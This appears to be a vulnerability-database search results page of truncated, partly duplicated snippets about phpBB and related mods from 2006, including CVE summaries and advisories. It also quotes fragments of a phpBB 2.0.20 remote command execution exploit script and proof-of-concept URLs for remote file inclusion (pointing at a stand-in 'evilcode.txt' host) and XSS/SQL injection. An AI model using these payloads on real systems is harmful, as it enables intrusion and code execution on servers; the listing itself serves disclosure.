PHPBB 2.0.20 persistent issues with avatars
phpBB 2.0.20 multiple issues with avatars. Some problems persistently lie in the way it handles remote and uploaded avatars. A remote user can: (1) saturate the server with useless files, because phpBB does not delete the previous one when you upload a new avatar; (2) use phpBB installations to launch...
FreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)
Multiple vulnerabilities have been reported within phpbb. phpbb is proven vulnerable to: script insertion, bypassing of protection mechanisms, multiple cross-site scripting vulnerabilities, SQL injection, arbitrary code execution. (C) Tenable Network Security, Inc. The...
phpBB 2.0.20 - AdminRestore DBdefault_lang Remote Command Execution
phpBB 2.0.20 - AdminRestore DBdefaultlang Remote Command Execution !/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid...
[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]
Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "O History, either we will attribute successes to you or we will count you as never lived." Abdullah Ocalan STOP THE MASSACRE IN THE...
phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit
Exploit for unknown platform in category web applications ============================================================== phpBB you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php...
phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "PhpBB = v2.0.20 "Admin/Restore Database/defaultlang remote commands execution\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "- you need an admin sid, works regardles...
phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution
!/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid cmd OPTIONS\r\n"; echo "host: target server ip/hostname\r\n"; echo...
phpBB 2.0.20 - Unauthorized HTTP Proxy
phpBB 2.0.20 - Unauthorized HTTP Proxy source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy...
phpBB 2.0.20 - Unauthorized HTTP Proxy
source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy...
phpBB "charts.php" XSS and SQL-Injection
// phpBB "charts.php" hack XSS and SQL-Injection // ----------------------------------------------------------------- Advisory by: LoK-Crew - Exploit: http://www.example.com/charts.php?action=vote&rate=1&id=XSS http://www.example.com/charts.php?action=vote&rate=1&id=SQL - Googledork:...
Foing 0.7.0 - 'phpBB' Remote File Inclusion
Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "O History, either we will attribute successes to you or we will count you as never lived." Abdullah Ocalan STOP THE MASSACRE IN THE...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
No description provided by source. Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "O History, either we will attribute successes to you or we will count you as never lived." Abdulla...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ========================================================== Foing Proof Of Concept : http://www.r0xed.com/foingpath/index.php?phpbbrootpath=http://evilcode.txt?&cmd...
Foing 0.7.0 - phpBB Remote File Inclusion
Foing 0.7.0 - phpBB Remote File Inclusion Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "O History, either we will attribute successes to you or we will count you as never lived."...
pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== pafileDB = 2.0.1 mxBB/phpBB Remote File Inclusion Vulnerability ================================================================== PafileDB Remote File InclusionphpBB Conta...
CVE-2006-2283
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) auth.php and (2) auth_phpbb when the phpBB portal is enabled, and via a URL in the smf_root_path parameter in (3)...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) auth.php and (2) auth_phpbb when the phpBB portal is enabled, and via a URL in the smf_root_path parameter in (3)...
CVE-2006-2283
CVE-2006-2283 affects SpiffyJr phpRaid versions 2.9.5 to 3.0.b3, enabling remote PHP code execution via remote file inclusion. Exploitation vectors involve crafted URLs in phpbb_root_path (auth.php/auth_phpbb with phpBB portal enabled) and smf_root_path (auth.php/auth_SMF with SMF portal enabled)...
CVE-2006-2283
Multiple PHP remote file inclusion vulnerabilities in SpiffyJr phpRaid 2.9.5 through 3.0.b3 allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) auth.php and (2) auth_phpbb when the phpBB portal is enabled, and via a URL in the smf_root_path parameter in (3)...
CVE-2006-2245
Summary of CVE-2006-2245 (CVE List: CVE-2006-2245) : Affected software is the Auction mod for phpBB (Auction mod 1.3m). The vulnerability resides in the file auction/auction_common.php, enabling a PHP remote file inclusion when an attacker supplies a URL in the phpbb_root_path parameter. This all...